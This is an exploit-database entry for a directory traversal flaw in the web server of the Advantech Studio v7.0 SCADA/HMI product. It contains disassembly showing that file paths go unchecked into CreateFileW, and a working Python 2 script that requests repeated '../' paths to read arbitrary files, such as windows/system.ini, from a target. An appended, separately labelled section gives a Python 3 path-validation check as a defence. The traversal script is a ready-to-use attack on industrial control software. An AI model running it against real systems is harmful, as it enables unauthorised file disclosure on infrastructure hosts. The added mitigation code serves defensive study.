0day.today - Biggest Exploit Database in the World.
Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A

'''
Advantech Studio v7.0 SCADA/HMI has a built-in web server, NTWebServer.exe. The web server
is a standalone executable that is used alongside every project to serve as a web-based
management system with the help of an ActiveX control.
The flaw occurs because of a lack of any check on the path of the file requested.

in function sub_401A90:

.text:00402A4A                 push    0               ; dwFlagsAndAttributes
.text:00402A4C                 push    3               ; dwCreationDisposition
.text:00402A4E                 push    3               ; dwShareMode
.text:00402A50                 push    80000000h       ; dwDesiredAccess
.text:00402A55                 mov     edx, [ebp+lpFileName]
.text:00402A58                 push    edx             ; lpFileName
.text:00402A59                 lea     ecx, [ebp+var_1C]
.text:00402A5C                 call    sub_401A90

sub_401A90 uses the CreateFileW function directly.

.text:00401A97                 push    0               ; hTemplateFile
.text:00401A99                 mov     eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C                 push    eax             ; dwFlagsAndAttributes
.text:00401A9D                 mov     ecx, [ebp+dwCreationDisposition]
.text:00401AA0                 push    ecx             ; dwCreationDisposition
.text:00401AA1                 push    0               ; lpSecurityAttributes
.text:00401AA3                 mov     edx, [ebp+dwShareMode]
.text:00401AA6                 push    edx             ; dwShareMode
.text:00401AA7                 mov     eax, [ebp+dwDesiredAccess]
.text:00401AAA                 push    eax             ; dwDesiredAccess
.text:00401AAB                 mov     ecx, [ebp+lpFileName]
.text:00401AAE                 push    ecx             ; lpFileName
.text:00401AAF                 call    ds:CreateFileW
'''

# Python 2 script (httplib, print statements, xrange).
import argparse
import httplib

MAX_NESTED_DIRECTORY = 32

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d')
    parser.add_argument('-p')
    parser.add_argument('-f')
    args = parser.parse_args()
    if args.d == None or args.p == None or args.f == None:
        print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
        return
    httpConn = httplib.HTTPConnection(args.d, int(args.p))
    for i in xrange(0, MAX_NESTED_DIRECTORY):
        temp = MakePath(args.f, i)
        httpConn.request('GET', temp)
        resp = httpConn.getresponse()
        content = resp.read()
        if resp.status == 404:
            print 'Not found ' + temp
        else:
            print 'Found ' + temp
            print'------------------------------------------'
            print content
            print'---------------------------------------EOF'
            break

def MakePath(f, count):
    a = ""
    for i in xrange(0, count):
        a = a + "../"
    return a + f

if __name__ == "__main__":
    main()

# 0day.today [2024-09-28] #
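
Added example (not part of the original advisory and not Advantech's code): the path check the advisory says is missing before CreateFileW, written in Python 3 and applied to the request shapes traverse.py generates. WEB_ROOT and the function names are hypothetical; ntpath is used so that Windows path rules apply on any OS.

```python
import ntpath
from urllib.parse import unquote

# Hypothetical web root for a project; not a path taken from the product.
WEB_ROOT = r"C:\Projects\Demo\Web"


def resolve_request(request_path, root=WEB_ROOT):
    """Map a requested URL path to a file under root, or return None.

    This is the check missing before CreateFileW: normalise first,
    then prove the result is still inside the served directory.
    """
    decoded = unquote(request_path)  # decode percent-escapes exactly once
    # Refuse NUL bytes and ':' (drive letters, alternate data streams).
    if "\x00" in decoded or ":" in decoded:
        return None
    # Windows accepts both separators; strip leading ones so join() stays relative.
    relative = decoded.replace("/", "\\").lstrip("\\")
    root_abs = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_abs, relative))
    # Case-insensitive containment test; the trailing separator stops
    # a sibling such as C:\Projects\Demo\Web2 from matching the root.
    prefix = ntpath.normcase(root_abs) + "\\"
    if not ntpath.normcase(candidate).startswith(prefix):
        return None
    return candidate


def audit(requests, root=WEB_ROOT):
    """Return (request, resolved-or-None) pairs for a batch of request paths."""
    return [(r, resolve_request(r, root)) for r in requests]


# Constructed sample: the request shapes traverse.py generates for
# -f windows/system.ini, plus one ordinary page request.
SAMPLE = ["index.html", "windows/system.ini",
          "../windows/system.ini", "../../../../windows/system.ini"]

if __name__ == "__main__":
    for req, path in audit(SAMPLE):
        print("%-34s -> %s" % (req, path or "REJECTED (outside web root)"))
```

String normalisation alone does not resolve junctions, symlinks or 8.3 short names, so a server on Windows should also confirm the final path of the opened handle (for example with GetFinalPathNameByHandleW) before returning content.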